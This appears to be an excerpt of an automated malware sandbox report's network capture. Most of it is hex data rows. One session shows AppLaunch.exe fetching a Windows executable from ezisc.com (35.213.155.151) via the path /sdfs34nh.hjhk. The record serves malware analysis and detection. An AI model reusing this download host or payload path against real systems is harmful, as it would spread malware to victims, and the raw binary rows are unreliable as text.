68 80 c2 3e e1 e2 ad c7 63 57 09 48 96 96 d0 99 ee 74 e8 37 7c 9e a3 fc 24 f2 6f 9e 33 05 88 b5 8b 29 dd 92 ab 87 7b 44 f7 8e 73 Data Ascii: !rul;Amg7f"uCot!~);rch~4{Gu>/8DX?08m CeL`z\| )BH9*sJi\vE@vZ-<#PiSmW%zWD~G,s:W%G'\{8XrZv(xh>cWHt7\|$o3){Ds
2022-11-07 22:49:05 UTC	7448	IN	Data Raw: c0 00 e2 f6 7c 9e 1e 7b c3 1a fe c8 0f 92 d9 53 05 12 d6 0c f6 c1 52 66 07 82 b3 ed c5 08 ec 3f 39 48 1c d6 44 06 f6 c2 13 24 39 84 78 f4 df 1a e2 d3 eb 2e d6 41 43 f7 d2 10 e3 94 6a 95 5c 57 ed 00 e2 de 08 d1 6e db 0b 20 c2 07 fc ce 8e e2 a6 90 07 ff ca 0e f0 69 4d fe b8 9b 39 08 ec cd 0f d1 d1 24 d1 b7 ca 0d e0 d5 4f e7 2c fa 5a e9 de 1c ea 75 e8 b2 69 b1 96 10 e3 d1 0a a2 5b 56 d1 65 87 87 9e d0 0e 1a df 74 ec 1b c9 7e 9f a8 9c a6 b5 42 dc fd c6 7a 85 6c a0 23 af 8f c0 60 64 81 7e a9 9e 90 93 9b 95 e1 2e a7 84 ae d3 eb 6b c7 ad 5d 34 81 a0 52 54 06 3a 90 1b 8b 53 bd bb 76 ed 65 b0 01 b6 03 12 22 44 8e 53 56 98 cc 58 58 da 08 43 c2 0a 38 67 a6 7e 09 63 d6 7b 24 3b f4 c3 b3 6c 92 b7 e2 2c 59 4d f4 04 07 62 89 cf 2b 2a 64 35 f6 0c 85 ab 4f 8d af 8f 4e 63 Data Ascii: \|{SRf?9HD$9x.ACj\Wn iM9$O,Zui[Vet~Bzl#`d~.k]4RT:Sve"DSVXXC8g~c{$;l,YMb+*d5ONc
2022-11-07 22:49:05 UTC	7464	IN	Data Raw: 17 01 3f b9 85 b6 3c a0 b5 60 ef 43 9e 3b 0c 11 cd 2a 40 3d 56 2f 83 42 af a3 38 d7 09 02 58 2c 03 86 55 7c e3 1b c5 28 55 c7 a9 78 c6 2e bc 3c b9 23 81 c4 07 63 19 72 bd 27 fb c3 0e 04 39 22 4b fe 32 ab b7 00 73 34 93 e0 48 3c 9c dd 16 3e 1d 18 3f 72 77 b1 a8 10 5b 40 0a 95 0e e8 1b 5e e9 34 57 3a a4 6a 05 c7 2b 7a b2 b8 b0 e7 24 2c 3f 55 c4 70 07 18 eb 22 cc 6c f2 fa 24 4e 47 74 4b 9f ea 35 1f 22 08 7e 6c d7 2b 69 39 3b 18 12 72 68 31 17 66 18 27 49 6a 34 6a 5a 70 a6 a8 c3 59 06 b1 3c 40 07 f4 24 71 30 60 6e 74 fd b6 8a 60 2b 4a 09 03 32 04 eb 01 4c 77 b4 20 2d 06 c1 1b e3 8d 23 53 a1 54 17 ac 79 c5 ec 80 4a d6 3d 43 ea a4 15 3d b4 50 d2 28 0b 10 0e 31 57 b0 3d 16 4a ed 8e 4a 40 cd 34 b8 45 ba 59 b9 53 2c c1 f5 20 11 7c f9 f1 e6 dd 9b 1e b0 47 d0 4c 49 Data Ascii: ?<`C;*@=V/B8X,U\|(Ux.<#cr'9"K2s4H<>?rw[@^4W:j+z$,?Up"l$NGtK5"~l+i9;rh1f'Ij4jZpY<@$q0`nt`+J2Lw -#STyJ=C=P(1W=JJ@4EYS, \|GLI
2022-11-07 22:49:05 UTC	7480	IN	Data Raw: 00 6f d8 23 77 4d 52 0a a4 2f 5a 33 2a 01 40 95 41 0e a7 63 da 0e 96 42 e2 79 4f 68 3d 72 86 bb 18 d0 4b 78 16 91 6d ca 93 4d 11 88 8b c6 03 2b 1f 33 2c f3 2f 33 26 3a 54 48 95 1c 22 0f 78 33 42 0d 11 6a f8 cf 02 ab 15 43 cc 56 41 05 ba 65 b8 48 6f 13 92 40 4e dd ab c9 a6 47 53 fe a6 16 41 11 d7 e6 7b 70 1d d2 75 93 1d 0a f7 4e 59 78 96 ae e2 47 07 43 5f d2 ef 87 d6 4b 8e 87 e1 ed 05 0f 1f 66 29 67 2f 36 2e 57 1d b3 04 87 21 30 39 aa 57 4c 34 41 52 0c e6 8e 5f 34 de 47 66 27 f3 2a 46 7b b6 f1 1c 67 2f 63 6a ca 5d f8 e6 29 5f 6d 34 77 97 75 91 82 54 5e 0e 5f 44 03 e1 68 9f 1e 48 31 59 48 50 8b 18 ae 4d 2e 41 2b 0f 3b 40 2a 32 4f ff 24 ea aa fc 32 95 05 43 2d e6 4c 11 67 9c 33 8d f7 4b 13 da 23 c0 f5 82 35 d1 55 68 2d 3f dd 95 75 81 4b 2c 28 b9 50 fc a9 53 Data Ascii: o#wMR/Z3@AcByOh=rKxmM+3,/3&:TH"x3BjCVAeHo@NGSA{puNYxGC_Kf)g/6.W!09WL4AR_4Gf'F{g/cj])_m4wuT^_DhH1YHPM.A+;@*2O$2C-Lg3K#5Uh-?uK,(PS
2022-11-07 22:49:05 UTC	7496	IN	Data Raw: 16 6f ae aa 6b 79 fd a4 85 9e ec 66 4b 64 c4 76 60 91 6c 48 69 73 2c 73 79 53 9b a0 54 97 62 ee 65 63 a8 be 78 71 53 71 43 e0 f5 e9 0e 53 e4 23 a4 50 4e 14 74 f7 ca cf 07 bd 21 34 8d 86 9b cb 7e 46 31 95 7e 88 50 e9 c4 9c d8 fa 4e ad 71 a2 43 ca f0 57 0c 7b 8a 0e 0c 29 73 3b 07 77 85 b0 e6 f8 3b 7f 78 46 69 3c 33 6b 9a 52 5d 0b a1 9c 70 6e 76 63 62 d7 ed 0d 75 c9 75 58 bf e4 81 35 66 fc 7d ec 5d cf 6a 40 7e 55 14 67 6a f0 70 cc e6 49 e5 bc 4d 98 fd 21 21 1e c4 72 42 d8 96 41 e3 6d ee 3e 48 c3 26 57 8e e5 4c 7c 58 4e 69 78 9f fb 62 a7 ca e8 0b 8c 6d 9d ed ea 6f 40 c0 92 7c 33 7b 13 1c 49 68 03 1f 17 00 fe ae b9 c0 3e 62 5e 49 b7 70 01 4a 8d d1 c7 8a 88 5e 69 5d 56 50 79 6f 65 7f c7 d8 0b ca 0e 0a dd 3c f8 73 a5 7f f2 6a 17 5c a4 14 6a 78 61 65 e2 60 65 f0 Data Ascii: okyfKdv`lHis,sySTbecxqSqCS#PNt!4~F1~PNqCW{)s;w;xFi<3kR]pnvcbuuX5f}]j@~UgjpIM!!rBAm>H&WL\|XNixbmo@\|3{Ih>b^IpJ^i]VPyoe<sj\jxae`e
2022-11-07 22:49:05 UTC	7512	IN	Data Raw: 6a 34 04 b5 6b 69 0c ae e8 75 24 d3 31 f6 9e 1a f3 6a 1e 65 6c 67 6a 49 f1 9d 00 77 63 a3 c3 24 7d ce be c8 aa 49 a5 62 7b 77 d2 7d c9 77 d8 57 26 73 ac d1 1b eb 20 cc b3 b6 8d f9 93 a3 74 b4 4e 94 70 72 df 38 aa 04 4e 16 06 85 63 c3 57 6b 0e 3b b3 e8 5f 41 6a 1a 7e 70 25 6c b3 21 0f 6d 69 5d 7e e3 b9 48 6c 7b 21 43 21 79 69 fe 60 3e d1 f6 04 03 6b 0b d4 d2 01 25 5d 5f b6 8e ec d9 29 02 e3 6b 59 ef cc da 0d da 74 83 e7 e7 a6 b1 7e 79 7e b5 7a 4f c5 0d 1a 6d 07 d3 0c bb e4 4f 27 6b 6e f0 4a 41 78 60 6a 8f fa 64 70 58 77 7f 0c d8 3a 99 fa 67 0f 67 72 a9 39 57 b4 3d 74 27 e3 2f 60 a7 fc 7f 77 38 86 6c 61 d1 90 6e 16 92 7b 02 f6 15 89 6b b0 89 2c ed 6d a5 a4 41 38 8d 30 27 c2 71 78 81 96 36 7c bb 42 21 08 2a 72 82 98 ab c0 ba 60 28 83 cd e4 a1 66 e8 ce e2 b4 Data Ascii: j4kiu$1jelgjIwc$}Ib{w}wW&s tNpr8NcWk;_Aj~p%l!mi]~Hl{!C!yi`>k%]_)kYt~y~zOmO'knJAx`jdpXw:ggr9W=t'/`w8lan{k,mA80'qx6\|B!*r`(f
2022-11-07 22:49:05 UTC	7528	IN	Data Raw: 6f 64 4e 67 ef 66 ad 06 79 7d 2b 78 77 58 e9 ee be ab c3 bb e1 ea 30 33 b3 66 0d 6f 4c 96 2c 00 7f 67 c6 26 d4 69 fc f3 55 31 ff da d5 77 aa cc a6 d9 6f 44 ab ca aa 0a 9b 77 05 61 5d e4 39 0c 82 36 2b 88 61 a1 67 a2 83 1e 62 62 32 ff f1 64 09 f3 7e 8b 68 e7 fa d1 42 79 cc 12 98 c7 b9 b3 78 5c 82 9e 4d 3b 73 e5 4e a4 c0 09 68 65 72 98 a2 b1 5a e3 79 e8 3a 65 dd f9 da 50 49 31 97 e6 60 b7 be 6c f2 09 5f 6c aa cd 4f 98 ee ba 45 25 18 6a d7 68 60 53 31 5e 66 4f 96 19 b5 91 ba 78 88 31 e3 67 8e 76 c3 2f 19 f2 26 e1 d9 44 2b e2 f9 ca 6f e1 e7 23 6c 6a 73 b5 c1 9a bb 07 a6 60 28 2b 74 7e 5d 3a 23 5b 6a f8 ed ea 78 47 71 af 0a 96 96 77 e2 08 30 1d 35 a7 c6 01 29 52 83 3d 59 5a 57 58 ab 71 e7 f2 2e 6b 62 8e c3 cd 20 a5 5c 87 a0 ca 30 55 27 6e da 5b 5b c8 d0 81 7b Data Ascii: odNgfy}+xwX03foL,g&iU1woDwa]96+agbb2d~hByx\M;sNherZy:ePI1`l_lOE%jh`S1^fOx1gv/&D+o#ljs`(+t~]:#[jxGqw05)R=YZWXq.kb \0U'n[[{
2022-11-07 22:49:05 UTC	7544	IN	Data Raw: 99 76 1f f0 fb 25 cc d2 7f 05 3e 38 09 78 45 b0 89 d5 72 0a 54 49 e5 ad 5e 4d 31 30 52 f7 02 02 08 5b 37 ed 4f 07 32 00 3d 6b 4d d7 4e 3d 45 dd 19 21 f5 ce 1a 41 02 79 42 4b df 51 6d 23 f3 2d 01 a6 dc 69 f3 61 3b 70 6e 3b 40 92 70 42 11 45 76 57 cc 44 54 e6 9a 6d 3b 53 3f 57 cf 64 17 ef 49 01 6e 7d 46 e1 53 d5 bc 00 14 41 61 5e 2c 3d fe 9d 88 c5 2d 20 05 39 9a 12 cd 61 ba 0d 00 72 0a 85 8d 67 11 6d 8a d9 f4 dd 58 28 71 6d f2 60 4f 5b 78 d3 0f 13 62 d8 36 36 36 87 61 47 6c 1a f1 1e 19 b6 03 04 fd a9 9c 95 da 09 e7 20 8f 6c 6d 1f e9 3f 13 0f 25 f7 d9 00 b8 74 5c 55 11 ef 18 e1 fd f4 4c 19 e5 29 65 ab 23 cd 74 99 3c 94 67 61 70 73 77 80 85 b7 05 e9 33 40 eb 0f 4a 2b 4a 7f 8e 7e 99 f0 4b c1 4c 6b 2c 79 b1 d7 99 7a e1 92 94 62 da 69 d4 3b 75 9f f0 21 b0 67 46 Data Ascii: v%>8xErTI^M10R[7O2=kMN=E!AyBKQm#-ia;pn;@pBEvWDTm;S?WdIn}FSAa^,=- 9argmX(qm`O[xb666aGl lm?%t\UL)e#t<gapsw3@J+J~KLk,yzbi;u!gF
2022-11-07 22:49:05 UTC	7560	IN	Data Raw: 26 e4 79 7a 58 6b c8 71 57 32 45 e8 70 17 74 74 13 5c 78 50 6a aa af c0 dc 41 6c f0 07 14 b0 12 01 7e 65 4f 40 f6 34 cf 6b 52 34 5f 57 33 b9 53 dc 73 43 d6 2d af 3e 41 db 69 78 05 72 13 56 64 e5 20 5d 0c 51 bd 6b 93 b2 46 c8 e8 59 67 69 01 39 bd 75 25 3c 15 6b 1f 65 7e 19 57 74 a2 33 6a d9 63 6d 0a 44 78 1c 67 2b e0 6f b6 6f c7 f9 97 9c df 09 86 c3 69 6f 14 35 ea f2 e7 70 85 74 8f cc c6 70 d8 0b 63 ac 46 41 58 f4 09 c4 e7 c9 7b 6e 55 67 d5 61 c8 aa 49 2a 69 fc 64 3c 4f 34 5e 16 7a 47 27 2f 63 81 71 33 70 64 5f 57 eb 33 41 fc 47 56 37 2a 60 4b 0b 5b f5 31 1e 39 4c 00 86 e7 34 6b da 9e 40 d8 c5 7a 90 05 1f 0a 32 48 fa 51 38 59 e4 6c 0e 22 aa 60 5e 23 e3 a1 b3 59 48 1d 22 ea fd f8 4f ba 44 14 7e d6 e2 d3 42 6f fa 48 99 ec 4d 83 21 4e af ac 64 1a 62 f1 c9 80 Data Ascii: &yzXkqW2Eptt\xPjAl~eO@4kR4_W3SsC->AixrVd ]QkFYgi9u%<ke~Wt3jcmDxg+ooio5ptpcFAX{nUgaIid<O4^zG'/cq3pd_W3AGV7`K[19L4k@z2HQ8Yl"`^#YH"OD~BoHM!Ndb
2022-11-07 22:49:05 UTC	7576	IN	Data Raw: ac 0e 77 de aa 9c 15 ba cd 45 60 20 69 81 6f 67 88 8a bc ba de 4e 24 49 d4 27 5a ba 6c 23 85 d7 88 dd b6 56 59 60 eb 72 36 e3 0b ad 89 89 09 bc b7 7a 6a b5 93 69 3e 83 c8 8e cd a6 25 3d 16 65 14 7f 00 77 8f d3 82 d8 00 65 e0 61 b9 7e e1 7c 0f 2b 07 bf 79 b5 7c dd 7b 55 6f b3 6c 18 28 1c 38 3e 6e ac 6e de 7a 80 ba 45 18 21 95 ff aa 87 d8 7b b1 b1 ea 6b 6f 83 27 a3 0e 79 a4 86 60 4b 68 73 94 3e 1d 08 ad 93 6c 53 6a 89 9a ae f1 75 76 82 8d f8 81 de 78 22 bc 77 86 f9 47 66 0d b1 88 97 76 c8 69 6b 6c 18 6c 7c 67 78 70 9c 69 7d b5 83 2d b9 41 61 45 63 5f 6e 57 9f 6b 51 4d 84 dd 14 76 3d 79 69 78 6d 34 7c d4 78 4a 67 e4 c5 43 da a0 73 2c 68 e3 74 62 29 42 98 fe 97 79 71 70 0d 77 6e 1d 60 d6 c9 41 dc 0e 78 ea 67 09 5c 77 86 d7 bc 56 87 6c 6a 6f 57 06 6b c7 0d e9 Data Ascii: wE` iogN$I'Zl#VY`r6zji>%=ewea~\|+y\|{Uol(8>nnzE!{ko'y`Khs>lSjuvx"wGfvikll\|gxpi}-AaEc_nWkQMv=yixm4\|xJgCs,htb)Byqpwn`Axg\wVljoWk
2022-11-07 22:49:05 UTC	7592	IN	Data Raw: 13 6e 9b e6 6f 04 6a 4a 75 c9 ba bd 10 8f 57 a3 77 60 90 73 88 47 64 ab ab c4 b6 84 75 99 a6 e9 87 e7 60 de 6f 0c 8f 93 ce 9c 0d 78 2a 18 77 06 9c 63 f4 e5 62 80 8e 08 b4 dc 9d b0 75 ba 96 8c 88 12 a2 3e 86 29 f0 34 74 ad 8f b8 e9 66 0e a9 97 a6 5e 89 32 7e 25 62 77 97 6f 4b 6c 3a 82 12 38 65 6e 20 71 e5 82 5b 54 f7 9c f0 80 f0 89 1b d8 7b bd 95 eb 45 86 83 ca 77 b9 89 dd 4f 79 2f 99 26 d3 10 96 31 62 9b 7c 97 4a 6e 7c ce 7a 75 06 62 87 3b 98 71 0a 63 dc 7f de 79 77 65 6c b4 8b d2 fe cf 6f af 67 62 76 69 2b 61 1a 13 a3 84 cc 78 66 39 ec 69 b5 79 62 c5 99 79 2c d2 cb 86 94 7f 7e 44 7a c9 7b 72 cd 6a 0c ae 29 93 a7 0e 76 0a 6b 1b 7a e7 64 4b 68 6f 95 47 dc 86 fa 10 68 08 7e 1f 6f f2 6a 74 66 3c 97 d4 b5 16 76 db 66 63 6c 6a da 71 52 1c 9b 10 c2 78 5e 7e 60 Data Ascii: nojJuWw`sGdu`ox*wcbu>)4tf^2~%bwoKl:8en q[T{EwOy/&1b\|Jn\|zub;qcywelogbvi+axf9iyby,~Dz{rj)vkzdKhoGh~ojtf<vfcljqRx^~`
2022-11-07 22:49:05 UTC	7608	IN	Data Raw: 06 84 36 83 5d 8f 25 85 0c ff 6b 7d 84 f6 9e 06 df 63 d4 6a 40 71 d2 5d ce a4 10 cc 18 11 28 64 60 8d 6e fc 6e 72 82 fa 9d 0a 72 f6 46 ed 29 2d 77 0c 2e 12 b6 44 8f 7b 1c 76 44 61 1f 21 91 12 5f 99 2e 9d 16 41 d3 88 13 c8 b7 18 69 79 9f fd 7c 7a 57 82 7a 7f 13 b0 0d a4 76 39 75 4d 79 02 70 55 16 54 fd 88 1c c9 f4 7c f0 e8 bb d5 8f 75 b0 fb 7f 6b 84 69 b6 d7 0f a6 82 79 2e 89 31 64 fc 6f d0 0e 6e dd 17 ed b5 80 72 d2 a6 31 90 14 18 7b 07 bf 82 b9 bd 6b b8 57 76 09 89 77 92 64 0c 98 01 26 f7 79 94 c4 11 98 3a ba 11 87 62 a5 76 e1 9c 73 35 e9 64 74 99 6e 8d 82 06 ce 78 84 96 8f e8 66 b2 d1 a5 ea 04 62 91 60 e8 9e 57 43 d6 9a 19 ba fc 69 24 97 62 35 29 79 b8 9b c1 ab 91 dd 17 98 6f d8 90 4a aa b3 6a 87 9a bf e4 85 1d e2 7e 34 91 49 06 62 0b 6f 92 39 b8 fc f2 Data Ascii: 6]%k}cj@q](d`nnrrF)-w.D{vDa!_.Aiy\|zWzv9uMypUT\|ukiy.1donr1{kWvwd&y:bvs5dtnxfb`WCi$b5)yoJj~4Ibo9
2022-11-07 22:49:05 UTC	7624	IN	Data Raw: fa d9 77 ec d7 54 c3 13 6c cf 6b 24 f8 2e a9 fa 03 3f 8b 6b 25 c7 7c f1 7a ec 7f 2e 80 ff 53 34 68 be 7e 17 fc 99 21 91 74 48 c5 09 26 66 63 d1 26 99 ed 92 51 bf 65 c7 d7 87 80 38 6c a5 60 7f 74 17 e6 af 6e 89 7a 40 8a c4 c0 41 01 ed 02 b4 af 7b 9a 63 43 69 8a d8 0a a2 c7 d1 4c 6f 88 cc 49 1e d0 32 b2 81 b2 12 7c 4b 12 60 c0 c1 21 ca 83 a9 0b 6b 85 61 06 ca 7a 92 d2 39 74 2f ad f6 90 67 24 d5 77 f3 63 62 d4 65 dc 89 13 cf 94 7c 21 c6 66 a9 63 e3 7c 8d 8d c3 aa 01 6c 2f c2 7d 96 66 20 6e 69 95 83 59 b7 d4 04 fd d9 74 d9 7d b4 63 4c b2 f1 d1 51 62 32 b9 6f 3f 6c c6 60 bc fb be e5 1c 6e af 7a 1c 75 9b 72 13 75 14 e7 fb 88 4b b1 f2 2c 69 da ac 42 ac 8f 4a 3c 6e 8a 44 ce 7f 29 ba 78 a9 15 22 1a 86 d8 80 d2 b5 17 7c 59 b1 fe c5 63 22 7c d5 4a dc 99 84 33 36 be Data Ascii: wTlk$.?k%\|z.S4h~!tH&fc&Qe8l`tnz@A{cCiLoI2\|K`!kaz9t/g$wcbe\|!fc\|l/}f niYt}cLQb2o?l`nzuruK,iBJ<nD)x"\|Yc"\|J36
2022-11-07 22:49:05 UTC	7640	IN	Data Raw: 91 d0 c5 7d 3e 61 6c 4e 7d 7d 39 79 b6 07 8b af 89 83 5a 92 47 4c 7c 09 91 e0 c4 50 13 4d e8 47 71 c9 bc c0 12 9d d0 12 56 5f 49 68 90 f1 04 25 c7 7b a6 48 43 87 63 43 33 36 5c 1b bc 6f 05 5b 60 05 fd 26 6f cb 80 1c 88 c5 54 31 70 8c 39 42 be 28 41 48 a3 ae f1 7b 09 b9 a4 e4 c4 f2 91 d5 54 5b 4a 0e 52 a0 a5 17 01 7d 5f 79 26 35 19 0e 44 56 eb 42 4c 53 20 59 24 00 9d 6e 87 fc f6 45 c0 5f 4e 6f 1d 21 b2 72 d3 c3 bd 58 c9 5e e7 a8 e3 49 47 6b 55 70 2a 04 ad 45 00 39 13 f8 76 53 4f 51 b1 4b d3 56 50 42 46 43 32 f0 5a 4f b6 13 f1 e5 c0 b5 51 a8 86 54 ad f7 8f 4a 5d 5f 61 ab bb a6 7d b7 41 2f 2c 53 3a 32 f7 89 90 4e 77 5e 6f 45 29 f9 00 a4 f4 1d e2 3e 3b c9 5e 23 35 b6 82 24 4e 2e 41 2c 7a 24 75 1a 3f 59 1f 06 6e 03 e8 7a c0 72 88 4e 90 18 7b b7 7f 4f c5 2f 88 Data Ascii: }>alN}}9yZGL\|PMGqV_Ih%{HCcC36\o[`&oT1p9B(AH{T[JR}_y&5DVBLS Y$nE_No!rX^IGkUp*E9vSOQKVPBFC2ZOQTJ]_a}A/,S:2Nw^oE)>;^#5$N.A,z$u?YnzrN{O/
2022-11-07 22:49:05 UTC	7656	IN	Data Raw: 66 08 78 0a 61 29 6c 0d 7a 1f 64 0b 66 21 79 1d 78 13 70 0a 6c 67 6a 6d 74 5d 79 73 63 61 76 3f 66 1b 78 19 61 01 6c 17 7a 1f 64 0f 66 1c 79 1a 78 1a 70 0b 6c 67 6a 6d 74 79 79 c7 67 51 55 15 66 55 47 00 0c 03 4c 12 1f 01 17 07 09 06 44 54 49 5b 40 42 4c 02 04 0e 1b 1d 10 19 04 5c 51 3e 32 2f 55 40 46 4f 1f 10 1b 1d 00 0f 0a 07 17 16 45 52 09 00 1f 40 55 53 79 73 45 16 10 12 13 06 04 05 01 58 19 02 00 0a 09 4e 43 1b 14 06 43 00 1b 1d 15 08 0d 14 47 00 1d 1a 0b 18 10 0e 10 1f 4b 0a 17 15 5b 0e 1f 09 54 05 55 49 46 05 18 1d 11 13 15 16 18 31 0f 1f 07 10 16 19 5e 46 47 45 56 4e 46 75 6b 4f 4c 58 0e 01 11 1d 12 21 17 15 17 55 08 08 00 09 19 50 56 0c 0b 19 59 12 15 03 03 04 19 0b 4c 02 05 07 08 1c 17 01 00 1c 54 10 17 18 4a 04 1f 0a 44 1b 47 5b 47 7a 69 41 56 Data Ascii: fxa)lzdf!yxplgjmt]yscav?fxalzdfyxplgjmtyygQUfUGLDTI[@BL\Q>2/U@FOER@USysEXNCCGK[TUIF1^FGEVNFukOLX!UPVYLTJDG[GziAV
2022-11-07 22:49:05 UTC	7672	IN	Data Raw: 40 01 00 00 00 04 00 00 00 09 00 00 00 67 4f 2b 40 01 00 00 00 07 00 00 00 00 00 00 00 c9 4e 2b 40 01 00 00 00 04 00 00 00 00 00 00 00 6f 4f 2b 40 01 00 00 00 09 00 00 00 00 00 00 00 1f 4f 2b 40 01 00 00 00 04 00 00 00 05 00 00 00 79 4f 2b 40 01 00 00 00 12 00 00 00 00 00 00 00 79 4f 2b 40 01 00 00 00 12 00 00 00 06 00 00 00 5c 3f 2b 40 01 00 00 00 03 00 00 00 00 00 00 00 5c 3f 2b 40 01 00 00 00 03 00 00 00 00 00 00 00 8c 4f 2b 40 01 00 00 00 09 00 00 00 00 00 00 00 8c 4f 2b 40 01 00 00 00 09 00 00 00 00 00 00 00 96 4f 2b 40 01 00 00 00 09 00 00 00 00 00 00 00 96 4f 2b 40 01 00 00 00 09 00 00 00 00 00 00 00 a0 4f 2b 40 01 00 00 00 0a 00 00 00 00 00 00 00 a0 4f 2b 40 01 00 00 00 0a 00 00 00 00 00 00 00 ab 4f 2b 40 01 00 00 00 04 00 00 00 00 00 00 00 ab 4f Data Ascii: @gO+@N+@oO+@O+@yO+@yO+@\?+@\?+@O+@O+@O+@O+@O+@O+@O+@O
2022-11-07 22:49:05 UTC	7688	IN	Data Raw: 00 24 ff 2b 00 40 e3 01 00 b0 e4 01 00 30 ff 2b 00 b0 e4 01 00 08 ee 01 00 3c ff 2b 00 10 ee 01 00 47 ee 01 00 54 ff 2b 00 50 ee 01 00 cc ee 01 00 5c ff 2b 00 d0 ee 01 00 ec ee 01 00 68 ff 2b 00 f0 ee 01 00 66 f0 01 00 6c ff 2b 00 70 f0 01 00 77 07 02 00 84 ff 2b 00 80 07 02 00 75 08 02 00 a0 ff 2b 00 80 08 02 00 c3 08 02 00 b0 ff 2b 00 d0 08 02 00 ac 09 02 00 b4 ff 2b 00 b0 09 02 00 f2 09 02 00 c0 ff 2b 00 00 0a 02 00 f2 0a 02 00 c8 ff 2b 00 00 0b 02 00 64 0b 02 00 d4 ff 2b 00 70 0b 02 00 1d 0c 02 00 dc ff 2b 00 20 0c 02 00 dd 0c 02 00 ec ff 2b 00 e0 0c 02 00 39 0e 02 00 f4 ff 2b 00 40 0e 02 00 40 10 02 00 0c 00 2c 00 40 10 02 00 4e 11 02 00 20 00 2c 00 50 11 02 00 a0 11 02 00 34 00 2c 00 a0 11 02 00 65 13 02 00 38 00 2c 00 70 13 02 00 88 14 02 00 48 00 Data Ascii: $+@0+<+GT+P\+h+fl+pw+u+++++d+p+ +9+@@,@N ,P4,e8,pH
2022-11-07 22:49:05 UTC	7704	IN	Data Raw: 00 07 42 03 30 02 c0 00 00 01 09 05 00 09 42 05 30 04 60 03 70 02 c0 00 00 01 00 00 00 01 09 04 00 09 32 05 30 04 c0 02 d0 01 00 00 00 01 0a 06 00 0a 32 06 30 05 60 04 70 03 50 02 c0 01 0a 06 00 0a 32 06 30 05 60 04 70 03 50 02 c0 01 0a 06 00 0a 32 06 30 05 60 04 70 03 50 02 c0 01 00 00 00 01 09 05 00 09 42 05 30 04 60 03 70 02 c0 00 00 01 09 05 00 09 42 05 30 04 60 03 70 02 c0 00 00 01 0c 07 00 0c 42 08 30 07 60 06 70 05 50 04 c0 02 d0 00 00 01 00 00 00 01 06 03 00 06 42 02 30 01 60 00 00 01 06 03 00 06 42 02 30 01 60 00 00 01 06 03 00 06 42 02 30 01 60 00 00 01 0a 05 00 0a 42 06 30 05 60 04 c0 02 d0 00 00 01 0a 06 00 0a 32 06 30 05 60 04 70 03 50 02 c0 01 06 03 00 06 42 02 30 01 60 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 Data Ascii: B0B0`p2020`pP20`pP20`pPB0`pB0`pB0`pPB0`B0`B0`B0`20`pPB0`
2022-11-07 22:49:05 UTC	7720	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49724	35.213.155.151	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-07 22:49:08 UTC	7721	OUT	GET /sdfs34nh.hjhk HTTP/1.1 Host: ezisc.com Connection: Keep-Alive
2022-11-07 22:49:08 UTC	7721	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Nov 2022 22:49:08 GMT Content-Length: 6231483 Connection: close X-Content-Type-Options: nosniff Last-Modified: Mon, 07 Nov 2022 11:02:43 GMT ETag: "5f15bb-5ecdf5ce301b6" X-Httpd-Modphp: 1 X-XSS-Protection: 1; mode=block Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT Accept-Ranges: bytes
2022-11-07 22:49:08 UTC	7722	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf_9PfPgLPf_;PfsVPf.V`PfRichPfPELZOaj
